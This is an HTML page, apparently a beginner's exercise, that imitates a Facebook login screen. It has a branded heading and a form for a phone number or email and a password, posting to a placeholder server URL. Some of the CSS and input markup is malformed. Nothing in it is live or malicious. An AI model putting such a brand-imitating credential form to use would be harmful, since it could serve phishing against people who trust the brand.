<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>main</title>

    <style>
        body {
            width: 440px; /* 원하는 가로 크기로 설정 */
            margin: 0 auto; /* 페이지를 수평 가운데 정렬 */
            background-color: rgb(148, 148, 148);
            
        }
    
        .layer {
            width: 100%; /* 가로 너비를 부모 요소인 body의 너비와 동일하게 설정 */
            /* 다른 요소들의 스타일을 필요에 따라 설정합니다. */
            height: 2400px;
            background-color: white;
        }

        .fb {
            text-align: center;
            color: blue;
            vertical-align: top;
        }

        .box {
            margin: 0;
            padding: 4%;
            width: 600%;
            height: 200%;
           background: linear-gradient rgba(245,245,245,1); opacity: 1.0;
           background-clip: border-box;
        }

  
        .login-wrapper {
            font-size: 14px;
            font-family: 'Roboto', sans-serif;
            margin: 10%;
            
            width: 600%;
            height: 200%;
            
       
    }


    </style>
</head>

<body>
    
    <div class="layer">
        <!-- Main content goes here -->

        <div class="fb"> 
            <h1><b>facebook</b></h1> 
        </div>
    
        <div class="login-wrapper">
            <form method="post" action="서버의url" id="login-form">
                <input type="text,number" name="userName" placeholder="휴대폰번호 또는 이메일 주소"><br>
                <input type="password" name="userPassword" placeholder="비밀번호"><br>
                <input type="submit" value="로그인">
            </form>
        </div>
    
     
    </div>


    </div>
    
    


</body>
</html>
